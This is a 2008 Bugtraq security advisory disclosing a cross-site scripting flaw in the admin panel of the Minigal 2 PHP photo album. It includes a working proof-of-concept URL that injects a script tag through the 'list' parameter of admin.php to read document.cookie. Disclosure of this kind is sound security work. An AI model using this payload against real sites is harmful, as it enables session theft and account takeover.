[<prev] [next>] [day] [month] [year] [list]
Message-ID: <20080304211847.21826.qmail@securityfocus.com>
Date: 4 Mar 2008 21:18:47 -0000
From: jose@...os.org
To: bugtraq@...urityfocus.com
Subject: Minigal 2 critical XSS
Title: Minigal 2 critical XSS
Author: Jose Carlos Norte (jose@...os.org)
Date: 4-3-2008
Severity: high
Vendor URL: http://www.minigal.dk/
------- Introduction
Minigal 2(a.k.a. MG2) is a picture album written in PHP, it have a simple administration panels, and makes non-ajax browsable albums.
------- The problem
The problem consist in a fully exploitable XSS. MG2 allows NON-Admin users to browser some areas of the admin panel, and one of these, have a XSS problem.
------- Exploitation
admin.php?action=import&list=%22%3E%3Cscript%3Ealert(document.cookie);%3C/script%3E
------- Status
Vendor contacted without response.
------- Credits
This bug was discovered by Jose Carlos Norte, (jose@...os.org).
Powered by blists - more mailing lists